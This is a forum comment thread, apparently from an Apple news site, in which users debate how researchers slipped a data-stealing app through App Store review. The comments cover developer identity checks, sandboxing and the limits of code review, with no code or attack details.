How does their exploit work? The app itself compiles and then runs the malware? But I thought sandboxing prevented that code from then being able to interrupt the code that belongs to other applications?
With the source Apple could do some automatic checks but ultimately a code review done by an expert would be the only way to be sure. I doubt these kind of reviews can be realistically implemented, the cost would be huge.The only way this will ever change is if the compilation of the apps is done on Apple servers.
Is this really new news? This was always possible, but it has a few problems.
[...]
2. If the app is good, why try and steal from users? The second problem is related to the first. If a developer spent a lot of time creating a good, functional app, then why would they hamper its performance by embedding malicious code?
[...]
They only reviewed it for a few seconds? wow.
The fact that it grabbed so much information is scary.
You completely miss-read the story and have no clue what you are talking about. That's scary.
How does their exploit work? The app itself compiles and then runs the malware? But I thought sandboxing prevented that code from then being able to interrupt the code that belongs to other applications?
The issue is that, if the walled-garden cannot protect end-users, then it has no value, or negative value. It certainly doesn't prevent outright copying, non-functional garbage apps, and it allows threats to the security of a users private information that frankly are easy to sneak by the "genius" approval staff they have.
Hmm, I'd bet you don't even have any older than when you signed up. Older than me...that would have to be in wooden casks.Who you callin' "kid"? I bet I have Mayonaise in the fridge older than you.
But it does protect. They only got information from themselves because nobody downloaded the app except themselves. And if _you_ had downloaded that app and they had stolen information from you, you would now be able to sue Georgia Tech and two researchers at the university for huge amounts of money. The walled garden isn't just technical protection. It protects you because Apple knows the identity of the people putting an app on the store, so crooks can put up malware, but they can't get away with it, and that stops them. Plus Apple has the ability to effectively kill an app.
I do love the troglodytes of the Apple fan base.
P.S. More than 98% of all Android malware is located in the Russian and Chinese Play Store apps, or side loaded... Much like many of those jail broken iPhones (that don't get included in these malware studies BTW.) If you stick to official apps in either app store, you will likely never get malware. Common sense reigns supreme.
That is obvious, thanks.
The issue is that, if the walled-garden cannot protect end-users, then it has no value, or negative value. It certainly doesn't prevent outright copying, non-functional garbage apps, and it allows threats to the security of a users private information that frankly are easy to sneak by the "genius" approval staff they have.
![]()
With the source Apple could do some automatic checks but ultimately a code review done by an expert would be the only way to be sure. I doubt these kind of reviews can be realistically implemented, the cost would be huge.
2. If the app is good, why try and steal from users? The second problem is related to the first. If a developer spent a lot of time creating a good, functional app, then why would they hamper its performance by embedding malicious code?
My Social Security number is only 3 digits.Hmm, I'd bet you don't even have any older than when you signed up. Older than me...that would have to be in wooden casks.
I like Apple's screening process for keeping out SOME of the bad guys.
I like it better for removing them after approval, once caught, and for having a paper trail pointing back to the criminal. Thus making it less worth their while.
I also like the OS design (better with each version) that limits what even CAN be done. Which needs to continue getting tighter, clearly.
I like these researchers, too! As long as they reported the issue to Apple privately long before dangling a treat in front of criminals. (That's good security practice, and if they didn't do it, and opted for attention instead, I don't like them so much... but I'll still take the benefit of their findings.)
Apple can never screen out and block everything anyone might try, but they've succeeded in making a safe, trusted platform that Android users can only dream of. AND it needs to improve--which can't happen without catching the loopholes.
How does their exploit work? The app itself compiles and then runs the malware? But I thought sandboxing prevented that code from then being able to interrupt the code that belongs to other applications?
The walled garden isn't just technical protection. It protects you because Apple knows the identity of the people putting an app on the store, so crooks can put up malware, but they can't get away with it, and that stops them. Plus Apple has the ability to effectively kill an app.
Probably they used the same method that jailbreaking uses... by exploiting a bug in the software.
Often that involves overrunning a buffer somewhere and injecting code.
Apple's spent years nailing down holes as soon as they're found, but if iOS7 is really a big rewrite as some claim, that'll just mean new holes.
That's exactly the way that other app stores work. Registration has long been the first defense, so that a malicious (or buggy) app can be traced back to its origin, and the developer notified or banned.
However, it's so easy to register as an Apple developer (look at all the people who do it sometimes dozens of times just to sell beta slots), that it's virtually useless as a preventative security measure. It's more about closing the door after the horse is gone.
I don't think it's all that major a rewrite. It's another version update, like any other, that happens to also coincide with a massive rethemeing of the entire OS.
Android developers have many more options to develop and distribute that are less restrictive in terms of vetting than the path required to be an iOS developer.
To me, there's really just one more basic option. iOS has a vetted store, and unofficial jailbroken options. Android has vetted store(s), official non-store sideloads (if you enable that), and unofficial rooted.
.None of them are that restrictive, iOS included. The $100 fee does help keep out the hobbyist hacker though, which is why RIM used to charge that for a Blackberry code sign key.
The key differences between Apples iOS and Googles Android are what Guido termed design decisions that both platform makers made that have created incentives and disincentives for mobile malware writers and cybercriminals in the intervening years, he said.
Foremost among them is Apples insistence that mobile application developers verify their identity before they can introduce new applications. That includes submitting actual identifying documents like a Social Security Number or official articles of incorporation.
Theres something that gets back to you, Guido said. That way, when Apple finds a malicious application, theres the possibility that you could suffer real world punishment.
In contrast, Googles Android Marketplace and Google Play platforms have much more generous terms for developers, who must pay a small ($25) fee and agree to abide by the companys Developer Distribution Agreement to begin publishing. Thats a low bar that makes it easy for malicious authors to get their wares out to hundreds of millions of Android users, according to Guido.
You can upload dozens of applications at once. If any get banned, you can just resign, sign up under a new identity and resubmit them, Guido said.
Determining the "should not be there" part is not that easy. Unless you use blatantly forbidden calls you typically need to understand the context in which the call is used because in many context it could be perfectly legit. Not to mention that the call doesn't need to be explicit at all, you can even "exploit" your own application if you willfully leave the right bug open. Good luck finding that... it can be very difficult even for an expert analyzing the source code.It's possible to some degree with a binary as well, you can do a static analysis on the binary and look for calls that should not be there.
Determining the "should not be there" part is not that easy. Unless you use blatantly forbidden calls you typically need to understand the context in which the call is used because in many context it could be perfectly legit. Not to mention that the call doesn't need to be explicit at all, you can even "exploit" your own application if you willfully leave the right bug open. Good luck finding that... it can be very difficult even for an expert analyzing the source code.
You can do almost anything with the binary, but it becomes even more difficult, which means even more expensive. I doubt Apple will field a host of software engineers with skill and experience in reverse engineering and code analysis to verify every new application and update in the App Store, it's simply too expensive.